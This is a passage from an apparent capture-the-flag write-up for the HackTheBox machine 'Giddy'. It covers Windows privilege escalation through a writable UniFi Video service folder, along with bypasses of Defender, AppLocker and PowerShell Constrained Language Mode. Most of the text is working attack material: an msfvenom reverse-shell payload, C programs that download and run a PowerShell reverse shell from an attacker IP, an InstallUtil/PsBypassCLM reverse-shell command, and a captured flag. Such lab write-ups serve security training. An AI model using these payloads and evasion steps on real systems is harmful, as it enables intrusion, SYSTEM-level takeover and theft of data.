SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
-
I can also access the shell on web at /remote .
Privesc x DLL Hijacking (Service Exploit)
If I list directories in Documents:
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\Stacy\Documents> dir
Directory: C:\Users\Stacy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/17/2018 9:36 AM 6 unifivideo
Seems like a service.
Let’s check what services are running: Commands that didn’t work:
1
2
3
net start
cmd /c 'sc query state=all'
Get-WmiObject Win32_Service
Let’s look specifically for a service named unifivideo in service registry:
- Listing name of the service
1 2
PS C:\> ls HKLM:\system\currentcontrolset\services | select-string 'unifivideo' HKEY_LOCAL_MACHINE\system\currentcontrolset\services\UniFiVideoService
- Checking properties of
UniFiVideoService:1 2 3 4 5 6 7 8 9 10 11 12 13
PS C:\> ls HKLM:\system\currentcontrolset\services | where-object {$_.name -Like "*unifivideo*"} Hive: HKEY_LOCAL_MACHINE\system\currentcontrolset\services Name Property ---- -------- UniFiVideoService Type : 16 Start : 2 ErrorControl : 1 ImagePath : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService DisplayName : Ubiquiti UniFi Video DependOnService : {Tcpip, Afd} ObjectName : LocalSystem Description : Ubiquiti UniFi Video Service
- Querying config for the service:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ cmd /c 'sc qc UniFiVideoService'
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UniFiVideoService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Ubiquiti UniFi Video
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
Says, stoppable. and states the Binary path at C:\ProgramData\unifi-video\avService.exe
Let’s search for exploits on Ubiquiti:
1
2
3
4
5
6
$ searchsploit ubiquiti unifi video privilege escalation
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation | windows/local/43390.txt
------------------------------------------------------------- --------------------------------
Upon start and stop of the service, it tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe. By copying an arbitrary taskkill.exe to C:\ProgramData\unifi-video\ as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM.
Checking permissions for c:\ProgramData\unifi-video
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\programdata> icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 files
WD (write data/add file) permissions for Users.
Uploading a reverse-shell exe file with msfvenom as taskkill.exe:
1
2
3
4
5
6
7
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4444 -f exe -o taskkill.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: taskkill.exe
But the file doesn’t run because it’s blocked by Defender.
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\programdata\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Bypass-AV (Win-Defender)
- Encoding payload with some iterations of shikata-ga-nai encoding with msfvenom didn’t work.
- Using a framework like veil-evasion didn’t work for me.
Let’s make binaries manually:
A payload like this works:
1
2
3
4
5
6
#include "stdlib.h"
int main()
{
system("whoami");
return 0;
}
Compile this using:
1
$ i686-w64-mingw32-gcc exploit.c -o exploit.exe
But this one doesn’t work and gives an error exploit.exe : New-Object : Cannot create type. Only core types are supported in this language mode. Because Constratined-Language mode is enabled. Bypassing CLM is discussed below. I’ll use another workaround.
1
2
3
4
5
6
#include "stdlib.h"
int main()
{
system("powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.18/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 4444");
return 0;
}
Since, I can execute basic commands. I can just make another user and make it administrator, but that wasn’t working for some reason. Still I can read root.txt: (Note: I can still take a shell with nc.exe)
1
2
3
4
5
6
#include "stdlib.h"
int main()
{
system("copy C:\\users\\administrator\\desktop\\root.txt C:\\users\\stacy\\desktop\\root.txt");
return 0;
}
Putting the file at the desired location, restarting the service:
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\Stacy\desktop> copy \\10.10.14.5\share\exploit.exe C:\programdata\unifi-video\taskkill.exe
*Evil-WinRM* PS C:\Users\Stacy\desktop> stop-service UniFiVideoService
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
*Evil-WinRM* PS C:\Users\Stacy\desktop> start-service UniFiVideoService
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to start...
*Evil-WinRM* PS C:\Users\Stacy\desktop> type root.txt
CF559C6C121F683BF3E56891E80641B1
To get a reverse shell you can use this C-Reverse-Shell code.
Google “reverse shell in c windows” to get this link.
I changed the IP and port no. specified in re.cpp then compile it using:
1
$ i686-w64-mingw32-g++ re.cpp -o taskkill.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
Then:
1
2
3
PS C:\> copy \\10.10.14.5\share\taskkill.exe C:\programdata\unifi-video\taskkill.exe
PS C:\> stop-service UnifiVideoService -Force
PS C:\> start-service UnifiVideoService
And I get a shell on listener as nt authority\system:
1
2
3
4
5
6
7
8
root@TheCaretaker:~/HTB/Giddy$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.104] 49751
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\ProgramData\unifi-video> whoami
nt authority\system
Group Policy bypass / Applock Bypass
If I pull winpeas binary and want to automate the enumeration on Possible DLL Hijacking on UnifiVideoService. Giddy doesn’t let me execute the binary. That’s because there’s a Group Policy blocking execution.
1
2
PS C:\> .\winpeas.exe
Program 'winpeas.exe' failed to run: This program is blocked by group policy.
Usually Applocker whitelists everything under windows directory. But here’s a list of writable directories where applocker won’t block executing binaries.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PS C:\> C:\windows\system32\spool\drivers\color\winpeas.exe
*((,.,/((((((((((((((((((((/, */
,/*,..*((((((((((((((((((((((((((((((((((,
,*/((((((((((((((((((/, .*//((//**, .*(((((((*
((((((((((((((((**********/########## .(* ,(((((((
(((((((((((/********************/####### .(. (((((((
((((((..******************/@@@@@/***/###### ./(((((((
,,....********************@@@@@@@@@@(***,#### .//((((((
, ,..********************/@@@@@%@@@@/********##((/ /((((
..((###########*********/%@@@@@@@@@/************,,..((((
.(##################(/******/@@@@@/***************.. /((
.(#########################(/**********************..*((
.(##############################(/*****************.,(((
.(###################################(/************..(((
.(#######################################(*********..(((
.(#######(,.***.,(###################(..***.*******..(((
.(#######*(#####((##################((######/(*****..(((
.(###################(/***********(##############(...(((
.((#####################/*******(################.((((((
.(((############################################(..((((
..(((##########################################(..(((((
....((########################################( .(((((
......((####################################( .((((((
(((((((((#################################(../((((((
(((((((((/##########################(/..((((((
(((((((((/,. ,*//////*,. ./(((((((((((((((.
Winpeas shows 2 interesting things to look onto:
DLL Hijackingon Unifi-Video1 2 3
Ubiquiti UniFi Video(Ubiquiti Networks, Inc. - Ubiquiti UniFi Video)[C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService] - Autoload - No quotes and Space detected Possible DLL Hijacking in binary folder: C:\ProgramData\unifi-video (Users [WriteData/CreateFiles]) Ubiquiti UniFi Video Service
- PS History file
1 2 3 4 5 6 7 8 9
[+] PowerShell Settings PowerShell v2 Version: PowerShell v5 Version: 5.1.14393.0 PowerShell Core Version: Transcription Settings: Module Logging Settings: Scriptblock Logging Settings: PS history file: C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt PS history size: 207B
PSHistory
PowerShell History is enabled by default starting in PowerShell v5 on Windows 10. They are usually as $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt You can even run (Get-PSReadLineOption).HistorySavePath to the path.
1
2
3
4
5
6
7
8
PS C:\> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice****
whoami
Get-Service -ServiceName UniFiVideoService
PS Bypass-CLM
PowerShell Constrained Language is a language mode of PowerShell designed to support day-to-day administrative tasks, yet restrict access to sensitive language elements that can be used to invoke arbitrary Windows APIs.
PowerShell v5 detects when AppLocker Allow mode is in effect and sets the PowerShell language to Constrained Mode, severely limiting the attack surface on the system.
If I run any powershell script like Invoke-PowerShellTcp to get a reverse-shell or PowerUp.ps1 for enumeration it gives:
1
2
PS C:\Users\Stacy> powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444
Cannot create type. Only core types are supported in this language mode.
To confirm Language mode is constrained:
1
2
PS C:\Users\Stacy> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
CLM can be bypass with this tool: PSByPassCLM which even offers a reverse-shell with FullLanguage.
I built the solution file while changing the target .NET framework as 4.5, rest weren’t working. I can get the Version for .NET installed in giddy by visiting C:\Windows\Microsoft.NET\Framework
1
2
3
4
5
PS C:\Windows\Microsoft.NET\Framework> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/16/2021 12:38 PM v4.0.30319
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.5 /rport=443 /U c:\windows\system32\spool\drivers\color\PsBypassCLM.exe
Microsoft (R) .NET Framework Installation utility Version 4.6.1586.0
Copyright (C) Microsoft Corporation. All rights reserved.
The uninstall is beginning.
See the contents of the log file for the c:\windows\system32\spool\drivers\color\PsBypassCLM.exe assembly's progress.
The file is located at .
Uninstalling assembly 'c:\windows\system32\spool\drivers\color\PsBypassCLM.exe'.
Affected parameters are:
assemblypath = c:\windows\system32\spool\drivers\color\PsBypassCLM.exe
rport = 443
revshell = true
rhost = 10.10.14.5
logtoconsole = true
logfile =
Trying to connect back...
And I get a shell, Checking Language on that shell:
1
2
3
4
PS C:\Users\Stacy\Documents> whoami
giddy\stacy
PS C:\Users\Stacy\Documents> $ExecutionContext.SessionState.LanguageMode
FullLanguage